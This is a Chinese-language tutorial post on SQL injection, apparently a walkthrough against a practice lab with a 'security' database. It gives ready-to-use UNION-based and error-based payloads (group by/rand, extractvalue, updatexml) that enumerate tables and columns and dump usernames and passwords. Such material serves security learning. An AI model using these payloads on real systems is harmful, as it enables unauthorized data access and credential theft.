常见的SQL注入

news2024/9/21 11:03:58

联合查询

如下，要求我们传入一个id值过去。传参?id=1，当我们输入id=1和id=2时，页面中name值和password的值会发生变化，说明此时我们输入的数据和数据库有交互并且将数据显示在屏幕上了

输入?id=1'，页面发生报错，说明后端对我前端的数据输入没有很好的过滤，产生了sql注入漏洞

继续判断，输入 ?id=1' and 1=1 --+ 页面正常显示

?id=1' and 1=2 --+ 页面不正常显示，说明程序对我们的输入做出了正确的判断，所以注入点就是单引号

页面会根据输入的数据变化而变化，当存在注入点时，优先考虑使用联合注入手法。

输入?id=1' order by 3 --+,页面正常

将3修改为4，此时显示未知的列，说明此时当前表中只有3列

上面我们判断出来了表中有3列，所以union select的时候就写xx,xx,xx三个数据

需让union select前面的参数查不出来而回显后面的语句，所以id=-1'

?id=-1' union select 1,2,3 --+

爆当前数据库名字

?id=-1' union select 1,2,database() --+

爆当前数据库中的表
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

爆表中的字段

#只需指定表名即可
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+
#或者指定当前数据库名
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

爆相应字段的所有数据

#只需指定表名和字段名
?id=-1' union select 1,2,group_concat(`id`,':',`username`,':',`password`) from users --+
#字段值不加反引号也可以
?id=-1' union select 1,2,group_concat(id,':',username,':',password) from users --+

报错注入

提交如下，获取数据库名字，使用group by

?id=1' and (select 1 from (select count(*),concat((select database() from information_schema.tables limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) --+

extractvalue() 函数

?id=1' and extractvalue(1,concat('^',(select database()),'^')) --+获取数据库名字

updatexml() 函数

提交如下，获取数据库名字

?id=1' and updatexml(1,concat('^',(database()),'^'),1) --+

获取当前数据库中表的名字

?id=1' and updatexml(1,concat('^',(select table_name from information_schema.tables where table_schema='security' ),'^'),1) --+

这里是说要显示的内容超过一行它不能显示那么多，所以在 table_schema='security' 后加上 limit 0,1.

如果要看第二行则，limit1,1，看第三行则limit2,1。以这个方法获取第四个表为users

爆表中的字段

?id=1' and updatexml(1,concat('^',(select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1 ),'^'),1) --+